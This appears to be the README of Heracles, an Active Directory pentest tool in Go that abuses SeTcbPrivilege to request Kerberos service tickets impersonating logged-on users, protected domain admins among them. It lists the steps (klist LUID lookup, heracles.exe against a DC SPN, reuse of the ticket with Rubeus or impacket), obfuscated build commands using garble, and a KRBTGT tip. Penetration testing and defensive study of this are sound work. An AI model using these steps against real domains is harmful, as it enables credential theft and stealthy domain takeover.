Go project to abuse SeTcbPrivilege to request service tickets on behalf of loggedon users (the 12th labour)
Heracles is an Active Directory pentest tool that uses LsaCallAuthenticationPackage to request a Kerberos Service Ticket as another connected user. This allows to target protected users (unlike LSASS dump methods) and is probably stealthier than basic impersonation techniques.
First use klist sessions to get the LUID of the victim (connected user or machine account 0x3e7).
Then use heracles to get a base64 encoded ticket to any service:
heracles.exe -spn HOST/DC.MINI.LAB -luid 0x1bb70d
The ticket is a base64 encoded kirbi file, you can use it with Rubeus or convert it to use it with impacket tools.
Dumping a service ticket to access the domain controller as a loggedon domain admin (protected user).
Then using it with impacket tools on another computer.
Compile with something like:
GOOS=windows GOARCH=amd64 go build -o heracles.exe -ldflags="-s -w" main.go
Use garble to compile your personal obfuscated version with:
GOOS=windows GOARCH=amd64 garble -literals -seed=random -tiny build -o hercules_ofs.exe -ldflags="-s -w" main.go
Sure, request a service ticket for KRBTGT/YOURDOMAIN. This could lead to detection if the Domain Controller keeps track of which computer requested the TGT and which computer used it.
